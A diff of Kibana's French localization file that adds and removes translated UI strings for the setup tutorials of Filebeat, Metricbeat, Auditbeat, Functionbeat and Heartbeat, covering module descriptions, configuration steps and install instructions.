"home.tutorials.azureLogs.longDescription": "Le module Filebeat ''azure'' collecte les logs d’activité et d’audit Azure. [Learn more]({learnMoreLink}).", "home.tutorials.azureLogs.nameTitle": "Logs Azure", "home.tutorials.azureLogs.shortDescription": "Collectez et analysez les logs à partir d'Azure avec Filebeat.", - "home.tutorials.azureMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Azure", - "home.tutorials.azureMetrics.longDescription": "Le module Metricbeat ''azure'' récupère les indicateurs de monitoring Azure. [En savoir plus]({learnMoreLink}).", - "home.tutorials.azureMetrics.nameTitle": "Indicateurs Azure", + "home.tutorials.azureMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Azure", + "home.tutorials.azureMetrics.nameTitle": "Indicateurs Azure", "home.tutorials.azureMetrics.shortDescription": "Collectez les indicateurs à partir d'Azure avec Metricbeat.", "home.tutorials.barracudaLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.barracudaLogs.longDescription": "Ce module permet de recevoir les logs Barracuda Web Application Firewall par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", "home.tutorials.barracudaLogs.nameTitle": "Logs Barracuda", "home.tutorials.barracudaLogs.shortDescription": "Collectez et analysez les logs à partir de Barracuda Web Application Firewall avec Filebeat.", "home.tutorials.bluecoatLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.bluecoatLogs.longDescription": "Ce module permet de recevoir les logs Blue Coat Director par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", - "home.tutorials.bluecoatLogs.nameTitle": "Logs Blue Coat Director", + "home.tutorials.bluecoatLogs.nameTitle": "Logs Blue Coat Director", "home.tutorials.bluecoatLogs.shortDescription": "Collectez et analysez les logs à partir de Blue Coat Director avec Filebeat.", - "home.tutorials.cefLogs.artifacts.dashboards.linkLabel": "Tableau de bord d'aperçu du réseau CEF", - "home.tutorials.cefLogs.longDescription": "Ce module permet de recevoir des données Common Event Format (CEF) par le biais de Syslog. Lorsque des messages sont reçus par le biais du protocole Syslog, l'entrée Syslog analyse l'en-tête et définit la valeur d'horodatage. Puis le processeur est appliqué pour analyser les données CEF. Les données décodées sont alors écrites dans un champ objet ''cef''. Enfin, tous les champs Elastic Common Schema (ECS) ayant des correspondances CEF sont renseignés. [En savoir plus]({learnMoreLink}).", - "home.tutorials.cefLogs.nameTitle": "Logs CEF", + "home.tutorials.cefLogs.artifacts.dashboards.linkLabel": "Tableau de bord d'aperçu du réseau CEF", + "home.tutorials.cefLogs.nameTitle": "Logs CEF", "home.tutorials.cefLogs.shortDescription": "Collectez et analysez les logs à partir de Common Event Format (CEF) avec Filebeat.", "home.tutorials.cephMetrics.artifacts.application.label": "Découverte", - "home.tutorials.cephMetrics.longDescription": "Le module Metricbeat ''ceph'' récupère les indicateurs depuis Ceph. [En savoir plus]({learnMoreLink}).", - "home.tutorials.cephMetrics.nameTitle": "Indicateurs Ceph", + "home.tutorials.cephMetrics.nameTitle": "Indicateurs Ceph", "home.tutorials.cephMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Ceph avec Metricbeat.", "home.tutorials.checkpointLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.checkpointLogs.longDescription": "Il s'agit d'un module pour les logs de pare-feu Check Point. Il prend en charge les logs de l’exportateur de journaux au format Syslog. [Learn more]({learnMoreLink}).", - "home.tutorials.checkpointLogs.nameTitle": "Logs Check Point", + "home.tutorials.checkpointLogs.nameTitle": "Logs Check Point", "home.tutorials.checkpointLogs.shortDescription": "Collectez et analysez les logs à partir des pare-feu Check Point avec Filebeat.", - "home.tutorials.ciscoLogs.artifacts.dashboards.linkLabel": "Tableau de bord de pare-feu ASA", - "home.tutorials.ciscoLogs.longDescription": "Il s'agit d'un module pour les logs de dispositifs réseau Cisco (ASA, FTD, IOS, Nexus). Il inclut les ensembles de fichiers suivants pour la réception des logs par le biais de Syslog ou d'un ficher. [En savoir plus]({learnMoreLink}).", + "home.tutorials.ciscoLogs.artifacts.dashboards.linkLabel": "Tableau de bord de pare-feu ASA", "home.tutorials.ciscoLogs.nameTitle": "Logs Cisco", "home.tutorials.ciscoLogs.shortDescription": "Collectez et analysez les logs à partir des périphériques réseau Cisco avec Filebeat.", - "home.tutorials.cloudwatchLogs.longDescription": "Collectez les logs Cloudwatch en déployant Functionbeat à des fins d'exécution en tant que fonction AWS Lambda. [En savoir plus]({learnMoreLink}).", - "home.tutorials.cloudwatchLogs.nameTitle": "Logs Cloudwatch AWS", + "home.tutorials.cloudwatchLogs.nameTitle": "Logs Cloudwatch AWS", "home.tutorials.cloudwatchLogs.shortDescription": "Collectez et analysez les logs à partir d'AWS Cloudwatch avec Functionbeat.", "home.tutorials.cockroachdbMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs CockroachDB", - "home.tutorials.cockroachdbMetrics.longDescription": "Le module Metricbeat ''cockroachbd'' récupère les indicateurs depuis CockroachDB. [En savoir plus]({learnMoreLink}).", "home.tutorials.cockroachdbMetrics.nameTitle": "Indicateurs CockroachDB", "home.tutorials.cockroachdbMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs CockroachDB avec Metricbeat.", "home.tutorials.common.auditbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.auditbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.auditbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.auditbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.auditbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.auditbeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.auditbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.install.debTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.auditbeatInstructions.install.debTitle": "Télécharger et installer Auditbeat", - "home.tutorials.common.auditbeatInstructions.install.osxTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.auditbeatInstructions.install.osxTitle": "Télécharger et installer Auditbeat", - "home.tutorials.common.auditbeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.auditbeatInstructions.install.rpmTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.auditbeatInstructions.install.rpmTitle": "Télécharger et installer Auditbeat", - "home.tutorials.common.auditbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {auditbeatPath} afin de pointer vers votre installation Elasticsearch.", - "home.tutorials.common.auditbeatInstructions.install.windowsTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Auditbeat pour Windows via la page [Télécharger]({auditbeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Auditbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Auditbeat en tant que service Windows.", "home.tutorials.common.auditbeatInstructions.install.windowsTitle": "Télécharger et installer Auditbeat", "home.tutorials.common.auditbeatInstructions.start.debTextPre": "La commande ''setup'' charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.", "home.tutorials.common.auditbeatInstructions.start.debTitle": "Lancer Auditbeat", @@ -4011,50 +3304,22 @@ "home.tutorials.common.auditbeatStatusCheck.successText": "Des données ont été reçues.", "home.tutorials.common.auditbeatStatusCheck.text": "Vérifier que des données sont reçues d'Auditbeat", "home.tutorials.common.auditbeatStatusCheck.title": "Statut", - "home.tutorials.common.cloudInstructions.passwordAndResetLink": "Où {passwordTemplate} est le mot de passe de l'utilisateur ''elastic''.\\{#config.cloud.profileUrl\\}\n Mot de passe oublié ? [Réinitialiser dans Elastic Cloud](\\{config.cloud.baseUrl\\}\\{config.cloud.deploymentUrl\\}/security).\n \\{/config.cloud.profileUrl\\}\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration.", + "home.tutorials.common.cloudInstructions.passwordAndResetLink": "Où {passwordTemplate} est le mot de passe de l'utilisateur ''elastic''.\\{#config.cloud.profileUrl\\}\n Mot de passe oublié ? [Réinitialiser dans Elastic Cloud](\\{config.cloud.baseUrl\\}\\{config.cloud.deploymentUrl\\}/security).\n \\{/config.cloud.profileUrl\\}\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration.", "home.tutorials.common.filebeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.filebeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.filebeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.filebeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.filebeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.filebeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.filebeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.filebeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.filebeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", - "home.tutorials.common.filebeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.filebeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", - "home.tutorials.common.filebeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.filebeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", "home.tutorials.common.filebeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.filebeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.filebeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.filebeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.filebeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.install.debTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.filebeatInstructions.install.debTitle": "Télécharger et installer Filebeat", - "home.tutorials.common.filebeatInstructions.install.osxTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.filebeatInstructions.install.osxTitle": "Télécharger et installer Filebeat", - "home.tutorials.common.filebeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", - "home.tutorials.common.filebeatInstructions.install.rpmTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", "home.tutorials.common.filebeatInstructions.install.rpmTitle": "Télécharger et installer Filebeat", - "home.tutorials.common.filebeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {filebeatPath} afin de pointer vers votre installation Elasticsearch.", - "home.tutorials.common.filebeatInstructions.install.windowsTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Filebeat pour Windows via la page [Télécharger]({filebeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Filebeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Filebeat en tant que service Windows.", "home.tutorials.common.filebeatInstructions.install.windowsTitle": "Télécharger et installer Filebeat", "home.tutorials.common.filebeatInstructions.start.debTextPre": "La commande ''setup'' charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.", "home.tutorials.common.filebeatInstructions.start.debTitle": "Lancer Filebeat", @@ -4067,37 +3332,26 @@ "home.tutorials.common.filebeatStatusCheck.buttonLabel": "Vérifier les données", "home.tutorials.common.filebeatStatusCheck.errorText": "Aucune donnée n'a encore été reçue de ce module.", "home.tutorials.common.filebeatStatusCheck.successText": "Des données ont été reçues de ce module.", - "home.tutorials.common.filebeatStatusCheck.text": "Vérifier que des données sont reçues du module Filebeat \"{moduleName}\"", "home.tutorials.common.filebeatStatusCheck.title": "Statut du module", "home.tutorials.common.functionbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.functionbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.functionbeat.premInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.functionbeatAWSInstructions.textPost": "Où '''' et '''' sont vos informations d'identification et ''us-east-1'' est la région désirée.", - "home.tutorials.common.functionbeatAWSInstructions.textPre": "Définissez vos informations d'identification AWS dans l'environnement :", - "home.tutorials.common.functionbeatAWSInstructions.title": "Définir des informations d'identification AWS", - "home.tutorials.common.functionbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.functionbeatAWSInstructions.textPre": "Définissez vos informations d'identification AWS dans l'environnement :", + "home.tutorials.common.functionbeatAWSInstructions.title": "Définir des informations d'identification AWS", "home.tutorials.common.functionbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.functionbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.functionbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.functionbeatEnableOnPremInstructions.defaultTextPost": "Où '''' est le nom du groupe de logs à importer et '''' un nom de compartiment S3 valide pour la mise en œuvre du déploiement de Functionbeat.", + "home.tutorials.common.functionbeatEnableOnPremInstructions.defaultTextPost": "Où '''' est le nom du groupe de logs à importer et '''' un nom de compartiment S3 valide pour la mise en œuvre du déploiement de Functionbeat.", "home.tutorials.common.functionbeatEnableOnPremInstructions.defaultTitle": "Configurer le groupe de logs Cloudwatch", "home.tutorials.common.functionbeatEnableOnPremInstructionsOSXLinux.textPre": "Modifiez les paramètres dans le fichier ''functionbeat.yml''.", - "home.tutorials.common.functionbeatEnableOnPremInstructionsWindows.textPre": "Modifiez les paramètres dans le fichier {path}.", - "home.tutorials.common.functionbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.functionbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.functionbeatInstructions.config.osxTitle": "Configurer le cluster Elastic", - "home.tutorials.common.functionbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.functionbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.functionbeatInstructions.config.windowsTitle": "Modifier la configuration", "home.tutorials.common.functionbeatInstructions.deploy.osxTextPre": "Ceci permet d'installer Functionbeat en tant que fonction Lambda. La commande ''setup'' vérifie la configuration d'Elasticsearch et charge le modèle d'indexation Kibana. L'omission de cette commande est normalement sans risque.", - "home.tutorials.common.functionbeatInstructions.deploy.osxTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", + "home.tutorials.common.functionbeatInstructions.deploy.osxTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", "home.tutorials.common.functionbeatInstructions.deploy.windowsTextPre": "Ceci permet d'installer Functionbeat en tant que fonction Lambda. La commande ''setup'' vérifie la configuration d'Elasticsearch et charge le modèle d'indexation Kibana. L'omission de cette commande est normalement sans risque.", - "home.tutorials.common.functionbeatInstructions.deploy.windowsTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", - "home.tutorials.common.functionbeatInstructions.install.linuxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.functionbeatInstructions.deploy.windowsTitle": "Déployer Functionbeat en tant que fonction AWS Lambda", "home.tutorials.common.functionbeatInstructions.install.linuxTitle": "Télécharger et installer Functionbeat", - "home.tutorials.common.functionbeatInstructions.install.osxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.functionbeatInstructions.install.osxTitle": "Télécharger et installer Functionbeat", - "home.tutorials.common.functionbeatInstructions.install.windowsTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({functionbeatLink}).\n 1. Téléchargez le fichier .zip Functionbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Functionbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Depuis l'invite PowerShell, accédez au répertoire Functionbeat :", "home.tutorials.common.functionbeatInstructions.install.windowsTitle": "Télécharger et installer Functionbeat", "home.tutorials.common.functionbeatStatusCheck.buttonLabel": "Vérifier les données", "home.tutorials.common.functionbeatStatusCheck.errorText": "Aucune donnée n'a encore été reçue de Functionbeat.", @@ -4107,46 +3361,27 @@ "home.tutorials.common.heartbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.heartbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.heartbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.heartbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.heartbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", "home.tutorials.common.heartbeatEnableCloudInstructions.debTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", - "home.tutorials.common.heartbeatEnableCloudInstructions.defaultTextPost": "Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", "home.tutorials.common.heartbeatEnableCloudInstructions.defaultTitle": "Modifier la configuration – Ajouter des moniteurs", "home.tutorials.common.heartbeatEnableCloudInstructions.osxTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableCloudInstructions.rpmTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableCloudInstructions.windowsTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableOnPremInstructions.debTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", - "home.tutorials.common.heartbeatEnableOnPremInstructions.defaultTextPost": "Où {hostTemplate} est l’URL monitorée. Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", "home.tutorials.common.heartbeatEnableOnPremInstructions.defaultTitle": "Modifier la configuration – Ajouter des moniteurs", "home.tutorials.common.heartbeatEnableOnPremInstructions.osxTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le 